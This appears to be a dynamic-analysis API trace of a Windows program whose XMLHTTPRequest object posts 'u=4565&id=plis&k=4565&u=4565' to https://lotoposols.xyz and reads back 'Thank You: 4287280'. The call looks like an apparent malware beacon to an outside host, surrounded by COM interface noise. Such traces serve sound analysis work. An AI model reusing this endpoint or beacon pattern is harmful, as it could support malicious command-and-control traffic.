	[0182.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0182.203] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0182.203] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0182.203] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0182.203] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0182.204] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0182.204] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0182.204] XMLHTTPRequest:IUnknown:Release (This=0x47a5b88) returned 0x0
	[0182.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0182.204] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0182.204] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0182.204] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0182.204] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0182.204] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0182.204] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0182.207] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0182.207] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0182.207] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0182.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0182.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0182.208] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0182.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0182.208] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0182.208] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0182.208] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0182.208] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0182.209] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0182.209] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0182.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0182.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0182.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0182.209] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0182.209] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0182.209] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0182.209] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0182.209] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0182.209] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0182.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0182.209] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0182.209] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0182.210] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0182.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0182.210] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0182.210] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0182.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0182.210] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0182.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0182.210] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a52f98 | out: ppvObject=0x5a52f98*=0x0) returned 0x80004002
	[0182.210] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0182.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0182.212] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x115888 | out: ppvObject=0x115888*=0x0) returned 0x80004002
	[0182.212] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0192.494] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0192.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0192.494] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0192.495] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0192.495] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0192.495] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 4287280", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0192.495] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0192.496] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0192.496] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0192.497] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0192.497] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0192.497] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0192.497] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0192.497] GetTickCount () returned 0x1165b1b
	[0192.498] GetTickCount () returned 0x1165b1b
	[0192.499] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0192.499] malloc (_Size=0xb0) returned 0x42e060
